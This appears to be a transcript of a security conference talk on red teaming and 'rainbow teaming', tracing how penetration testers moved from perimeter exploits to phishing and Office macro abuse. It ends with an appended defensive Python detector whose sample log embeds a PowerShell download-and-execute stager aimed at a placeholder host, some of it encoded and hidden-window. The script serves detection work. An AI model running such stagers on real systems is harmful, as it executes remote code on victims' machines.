
I work for MWR InfoSecurity; we also go by the branding of MWR Labs. I'm actually a UK director, but we do have a New York office out here, and as you can tell I sound very British. I don't want to get too close to it, okay, it's like a stand-up show. So I am a director of the UK Professional Services Consulting division. I have a long history of delivering technical penetration testing, offensive-type security, and I specialize in an area that you guys are probably more familiar with, or would call, red teaming, except we call it something different and it's slightly different, and that's kind of some of what I'm going to cover in this talk. Basically, what I largely do are what we coin "simulated attacks", and that's where we put an organization through a live-fire drill: they think a real attack is occurring, then we benchmark how they react to it and we use it as a learning exercise. You guys probably think of this as a red team, but there are some nuances that we'll cover, and that's what I want to try and do: explain what rainbow teaming is. Now it's not a new term, it's not something that's going to be adopted, it's not something that I'm promoting, but it kind of captures what I'm talking about. As we go through the talk we'll get that covered off, and I'm going to talk to you about some of our tradecraft, MWR's experiences, how we've approached red team type testing, the types of tools we use, the TTPs we employ, how they've matured over time, what's prompted us to evolve in that way, i.e. what defensive challenges we've had to overcome. So hopefully there are going to be some takeaways for anyone in the room. By a show of hands, how many guys and girls self-identify as red team in here? Blue? Black? Gold? Purple? So you're a full rainbow team, all right, cool. And also I'll wrap up the talk with some ideas around defensive tactics and techniques that can be used to respond to some of the tradecraft that we're employing.

Rainbow teaming, okay, so what is it, and why is there no pink team? Everyone's seen the movie; nobody wants to be in the pink team. But I'm sure as we evolve even further maybe there'll be a pink team, maybe it'll be mauve, I don't know, but we seem to be putting them into buckets of colour. So, black team: this is brand new, no one's actually using this term properly. It's essentially because you guys have red teaming, and in the UK we see red teaming as being largely physical, so like burglary, scaling fences and stuff, and we don't really do that in the UK; it's not really the forte of many threat actors, for reasons I'll explain a little bit later on. But essentially in the UK the Bank of England have come up with a regulatory scheme for this type of assessment and they've put physical into a bucket called black teaming. I'm sure you're all familiar with red teaming, which is kind of the digital offence side of things: your phishing attacks and the like, we break in with an implant or a piece of malware and then move to an objective. Blue often refers to the detection and response team; there may be separate teams, but they're quite often bucketed into the same thing, so those are the guys running your SOC looking for your alerts, maybe doing a little bit more proactive activity; it could be your incident responders, the guys with boots on the ground when the proverbial hits the fan. And you've got purple. Now I've heard people, mainly in the States, talk about purple teams as in you have a red team, a blue team and a purple team. For me, purple team is more conceptual: it's a relationship, a collaboration, rather than a physical external entity to a red and blue team. Purple team should be used as descriptive language to articulate red and blue coming together for a common goal. Gold team: now this throws most people, people are like, what the hell's a gold team? Whether you're in the red team or the blue team and working within a business, most organizations will have a group of people that come together in a sort of crisis. It doesn't have to be a digital breach, it could be anything that business is going through that needs those sort of generals of the battlefield, the guys that come together and are the ones that make the tough decisions. They might end up sat in front of the press, they might be having to deal with the digital breach, or it could be something else, it could be a toxic spill, whatever. So a gold team is that group, and putting them through their paces and testing those.

Now how does it all come about? Well, I'm a little bit old, maybe not as old as some in the room but definitely older than others, and I've been in the industry within the UK for quite a while. What I've seen, from the very beginning, is very cowboy-like behaviour displayed by various different pen test firms, and the organizations that wanted to procure our services were quite relaxed about them as well. In the early days it was kind of: okay, you guys are the hackers, come and break in, put a file on my desktop and then I'll believe that you're any good. Then over time that matured slightly, either because they started to employ pen testers that crashed networks, brought down boxes, and then people panicked and cried and screamed, etc., and the reaction was: okay then, we can't allow this free rein to continue, we need to test with very narrow scopes, control the risk, and it became very compliance-driven, almost boring in cases, definitely not holistic. But then we've kind of come round full circle now. As more and more organizations have been breached, you've got a lot of threat intelligence firms out there releasing information about adaptive and capable real nation-state threats, as well as criminal groups, that really don't operate like pen testers and obviously operate without any scope, so the industry, or organizations that are looking to defend themselves against these types of attacks, have recognized that a pen test just isn't going to cut it, and now it's back to: right, come at me with all you've got, let me see.

Whilst the industry has matured on both sides, organizations recognizing that they need to take cyber security that much more seriously, vendors out there have also matured and use robust methodologies, advanced tradecraft and tooling, etc. This has been spurred on, at least in the UK, where we're really into our regulation, by regulators. So there are various schemes out there, government and commercial, financial and other sectors, that demand a certain level of, or have an expectation that, certain organizations will have gone through an advanced level of cyber security assurance. You can rubbish it or think what you want about certain schemes out there, PCI being a good example, but what they are great for has been as a catalyst to get a lot of organizations to mature rapidly and start to at least think about cyber security outside of just a very narrow-scope pen test. The main ones for me that I come across in the UK are the CHECK scheme, CREST, Bank of England CBEST, which is a regulatory framework for testing financial institutions' resilience to capable attacks and breaches, and that's gone over into places like Singapore under the iCAST scheme... sorry, Hong Kong under iCAST; Singapore's launches soon, Kuala Lumpur, and I know the US are looking at this as well. So what these schemes have done is try to map out a methodology for delivering this type of test, again what you guys would call red teaming, what I would call targeted attack simulations, but hopefully we'll find a common lexicon at some stage. There's been this attempt to classify it, and that's why we've ended up with all the lovely colours, but what we've also had is vendors coming along with their own terminology to confuse it slightly as well. As you can see, we've had "full spectrum cyber", "targeted attack simulations", I mean that's one of ours, "full spectrum attack simulation", cyber cyber site, etc. If you can imagine that you're an organization looking to procure some level of assurance against this sort of stuff and you're going out trying to buy this, the language is so confusing. How do you know what you're getting? Is that the same as that, is that something different, is that better, is that worse? So there has to be a common lexicon. Now I do not advocate that it is rainbow teaming, that really is just me taking the piss a little, but we do have to come up with something at some stage, otherwise we'll end up with rainbow teaming or full spectrum cyber. I personally don't care what it is called, just that it's done properly, and for me, for something like this to be done properly, it means going into a business, speaking to the board about what their real concerns are from a cyber perspective, i.e. what threats do they think they're facing, how resilient do they think they are, what outcomes are they looking to get from such an engagement, and then I work my way backwards and design that programme, and it becomes a cyber security programme, which doesn't sound as sexy as threat emulation, simulation, full spectrum cyber or rainbow teaming, but it doesn't really matter; it's what resonates with the board. Now the problem is the colours at least do resonate with many boards at the moment, obviously probably not gold and black team out here yet, but eventually we're moving in that direction.

So what do these things mean to me, and how do I go about one of these types of assessments, how would I build it out? Typically when I get engaged with a client that wants to procure our services, a lot of people want a red team, because red team's super hot and sexy and everyone knows what a red team is, and most board members have read about it in some in-flight magazine and they come back to their business going: I want a red team, get me a red team, we need a red team. Then no one challenges them and just goes, okay, we'll go get your red team. But unless you've actually got a benchmark of your own defensive capabilities against some kind of measurable standard, how do you know, how are you going to measure the success criteria of a red team? A red team isn't there just to come along and slap you in the face and say aren't we clever; it's supposed to be about helping an organization build up their defences, train their people and make them more resilient to attack, or at least assist them with their detection and response capabilities. So if you're going to do that you need to measure, you've got to have some kind of starting point, and if you don't have that starting point, what are you really handing that cash over for? So my advice would be, for any organization, if you don't have that benchmark to start off with, go and get it. There are various ways to go and get it: you can use your internal teams, you can look at frameworks such as ATT&CK, which is a great matrix, a catalogue that contains lots of different TTPs in a matrix format, and they've even extrapolated it down so you can emulate particular threat actors from TI reports that are out there. All you're really doing is making sure that all that security spend that you've handed over to various vendors for their little blinking boxes is doing what it should do. The best example is AV, okay: everyone rubbishes AV, but at least it catches a lot of crap, and you don't want that crap on your network, but at the same time you don't want to be caught out by that crap. So if you've got AV, you just want to make sure that it's working, it's ticking along, you don't put a lot of effort into it: run some automated test cases, benchmark that what you've bought is doing what it should do, and then at least if you use something like ATT&CK you can get a gap analysis: you know you're picking up these certain things, you're not picking up those certain things, you can go away and tweak those yourself, or then you can start thinking about more advanced things depending on your level of maturity.

Now internally at MWR we have our own tooling, we have something called Attack Sim where we can run automated playbooks and different tradecraft and different sorts of attack paths through it, and we can benchmark that detection and response capability and help tweak it. CALDERA is an automated proof of concept, very much in beta, but it's available from MITRE as well. And then you can roll your own; like I said, that framework is there, those TTPs, every command you need to run, in whatever scripting language you like you can just script that up, run it, even if you have to manually type it in, and just see the right alerts fire, okay.

Then I would move on to what you guys probably call a red team and I would call an attack simulation, which is basically you want to put blue team through a live-fire exercise with a red team. But we also drop in some of our own blue team guys that will sit with the client's blue team to benchmark their abilities as they go; they can either train them and tutor them along the way by steering them in the right direction, or they can just sit back and observe and get a true measure and produce that gap analysis. We also embed some red teamers to give that purple team element, either as part of the engagement or at the very least at the end of the engagement: our red team go in, share all our tradecraft, all the tools, the whole attack, that's what we did, why we did it, when we did it, etc., and we're open to full interrogation by the blue team so they can fully understand the attack. Then we might re-run various elements of it as well, because it's a learning exercise. That's where the real fun starts and that's where the real value is: the value doesn't come by steaming in and smashing all the things and getting domain admin, the value comes from showing how we did that, how we operated within that environment, why we did what we did when we did it, how we reacted, how we adapted, etc. The core of this is that red is there to skill up blue, not to prove a point or have an ego. We also like to include the gold team element. It might be during the engagement, you can get that crisis management team together; if not, once you've finished, blue team have had their chance, interrogated you, you've gone through it all, all the playbooks are open, then do a tabletop exercise for that crisis management team: re-run through the exercise using that as a playbook and see how people react, how they go through it. There will not be any wrong answers; you just want to see how people react under that pressure, under what would be a real attack, with contextualization against their own environment. So that's kind of rainbow teaming, but don't call it rainbow teaming; we've got to come up with a new name that resonates.

Now for the rest of this talk I want to walk through some of our tradecraft, how we've evolved it over time, and some defensive tips as well as we go. I've personally, over the past three, four, five years, something like that, worked with a team of guys where we've robbed a lot of banks, gone into mines, done crazy things with crazy computer systems, casinos, all sorts of different places we've been into, and over these years what we've seen, especially with the clients that we work most often with and go around the circle with, is that they're getting more and more mature all the time. I'm going to talk about what I've come across and what my team has come across from my perspective; some of this might be shared views, you guys might have had similar experiences, but what I do is I talk to a lot of others in the industry that I've got relationships with: guys at NCC, guys at Context, MDSec, they're a UK firm, you guys are probably familiar with the guys over at SpecterOps where Arts used to be, at Veris Group, and we share tools, we share tradecraft, stories over beers, etc. The feedback I've had is that these are shared experiences, so hopefully you guys might get some resonance from them as well. I'm going to be talking at a high level to get through it all, but if anyone wants to grab me and go into detail afterwards, you can buy me a beer or I'll buy you a beer, it doesn't really matter; I'm quite happy to talk about this stuff.

Okay, so a very quick history lesson to go through. We used to start off, six, seven, eight years ago, where to get into an organization you just had to have a little poke at the perimeter. There was always a weak service, an API, an app or something that would drop you into a shell; you could reverse proxy, you could use all your pen test tools, it really wasn't hard, and then you were straight into the environment and away you went. No one was really defending, no one was really looking, so in and out, easy days, aren't we clever. Then things got that little bit harder. Defenders started going, I don't want this to be as easy as it is anymore, started plugging those holes, getting web application firewalls, all the usual stuff; they went to the perimeter and locked it down. So we had to think about, okay, let's go around the perimeter, what can we do then? And this is the age of phishing: we shifted over to basically emailing the meat suits sat at the end of the computer, who are easy to trick, and we sent them attachments or links to websites that pointed to something as simple as Metasploit autopwn, where it just ran through and goes, what software are you running, there's an exploit, great, away we go. Again you're using your pen test tools; there was nothing big and clever about that, but it worked a lot. Again we felt like super ninja hackers, but really, were we? All it took from the defensive team to respond to this sort of stuff was to start patching the desktops, the browser plugins. Okay, there was a lot of effort made by various browser vendors and plugin vendors to code a little bit more securely and plug this down, but generally we were using not zero-days, we were using patchable vulnerabilities months after patches had been available, so this was like security hygiene they just had to get right. A lot of those holes got closed, the defences went up, shiny boxes came out that would detect these types of attacks; they're easily signatured, so if you were sending through a malicious PDF then someone somewhere had a signature for it, it was either in AV or in a mail gateway scanner. Same thing when you were visiting a site that tried to trigger some sort of browser exploit: they all had similar patterns, people didn't really customize them, they were all coming out of Metasploit, the defenders had access to the same tooling, so it was easy to signature and sell you a box that could detect or block that. So we were defeated: our phishes were getting caught, our exploits weren't working, we went from super ninja hackers to basically feeling quite crap. We didn't have any shells, and it would be quite an embarrassing thing to turn around to your client and say, no, couldn't get in because all your flashy boxes stopped us.

So in order to react we moved to more social engineering focused things: if our exploits were getting caught because they're easily signatured, that shellcode we keep reusing from Metasploit is now famous, etc., then let's just abuse functionality in common applications on the desktop. I'm sure a lot of you are familiar with using Word macros, Excel DDE, PDF JavaScript, etc.; all of them have built-in functionality that allows you to execute commands, or some level of code execution, or built-in scripting languages that can be abused. So all we were doing was abusing that feature, and a little bit of trickery, not trying that hard, to get users to click on stuff. That's why it was still usable, but less so. We were looking at different tooling: PowerShell was becoming the thing, everyone was getting super excited about this powerful scripting language that was available in the Windows world for post-exploitation; small scriptlets could be dropped to disk, you could customize them easily, it was fun times.
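An added example, not part of the talk and not MWR's tooling: the Python script below shows the kind of check a blue team could run over process-creation telemetry to catch the macro/DDE-to-script-host tradecraft the speaker describes (an Office or Reader process spawning cmd, PowerShell, mshta and friends), and it decodes any `-EncodedCommand` blob so the staged PowerShell is readable for triage. The event field names (Image, ParentImage, CommandLine, User), the parent and child process lists, the indicator patterns and all the sample log lines are constructed or assumed for this demo, not taken from the talk.

```python
"""Flag Office/Reader processes spawning script hosts, decoding -EncodedCommand.

Constructed example: the log lines built below are made up for this demo and are
not real telemetry; their shape loosely follows Sysmon Event ID 1 (process
create) exported as one JSON object per line. Field names are an assumption.
"""
import base64
import json
import re

# Parents that a phishing payload (macro, DDE, PDF action) would typically run under.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                  "msaccess.exe", "acrord32.exe"}
# Children that indicate command or script execution rather than normal Office work.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "msiexec.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"(?i)(-e(?:nc(?:odedcommand)?|c)?\s+)([A-Za-z0-9+/=]{16,})")
# Indicators that raise severity; matched against the command line and decoded payload.
INDICATOR_RE = re.compile(
    r"(?i)(?<![\w-])(iex|invoke-expression|downloadstring|downloadfile|frombase64string|"
    r"-nop(?:rofile)?|-w(?:indowstyle)?\s+hidden|-e(?:nc(?:odedcommand)?)?(?=\s))")


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_powershell(script: str) -> str:
    """Base64 of UTF-16LE text, which is what powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event: dict):
    """Return a finding dict for a suspicious parent/child pair, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    # Replace the base64 blob so indicator matching runs on readable text only.
    visible = ENC_RE.sub(r"\1<blob>", cmdline)
    text = visible + (" " + decoded if decoded else "")
    indicators = sorted({m.group(1).lower() for m in INDICATOR_RE.finditer(text)})
    return {
        "user": event.get("User", "?"),
        "parent": parent,
        "child": child,
        "decoded": decoded,
        "indicators": indicators,
        "severity": "high" if indicators else "medium",
    }


def scan_log(text: str) -> list:
    """Parse JSON-lines process-create events and return findings in log order."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        finding = analyse_event(json.loads(line))
        if finding:
            findings.append(finding)
    return findings


def build_sample_log() -> str:
    """Constructed events: three Office/Reader-spawned script hosts and three benign lines."""
    office = "C:\\Program Files\\Microsoft Office\\root\\Office16\\"
    ps = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    cmd = "C:\\Windows\\System32\\cmd.exe"
    stager = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
    events = [
        {"ParentImage": office + "WINWORD.EXE", "Image": ps, "User": "CORP\\alice",
         "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + encode_powershell(stager)},
        {"ParentImage": office + "EXCEL.EXE", "Image": cmd, "User": "CORP\\bob",
         "CommandLine": 'cmd.exe /c powershell -nop -w hidden -c "' + stager + '"'},
        {"ParentImage": "C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe",
         "Image": cmd, "User": "CORP\\carol", "CommandLine": "cmd.exe /c calc.exe"},
        {"ParentImage": "C:\\Windows\\explorer.exe", "Image": ps, "User": "CORP\\admin",
         "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},
        {"ParentImage": office + "WINWORD.EXE", "Image": "C:\\Windows\\splwow64.exe",
         "User": "CORP\\alice", "CommandLine": "splwow64.exe 12288"},
        {"ParentImage": office + "OUTLOOK.EXE", "Image": office + "WINWORD.EXE",
         "User": "CORP\\alice",
         "CommandLine": office + "WINWORD.EXE /n C:\\Users\\alice\\AppData\\Local\\Temp\\invoice.docx"},
    ]
    return "\n".join(json.dumps(e) for e in events)


if __name__ == "__main__":
    for f in scan_log(build_sample_log()):
        print(f["severity"].upper(), f["user"], f["parent"], "->", f["child"], f["indicators"])
```

Run as-is to see the three findings from the constructed log; in a real estate you would feed it Sysmon Event ID 1 or Windows 4688 events with command-line auditing enabled, and tune OFFICE_PARENTS and SCRIPT_HOSTS to your environment, since some legitimate line-of-business macros do call cmd.exe and would otherwise land in the medium bucket every day.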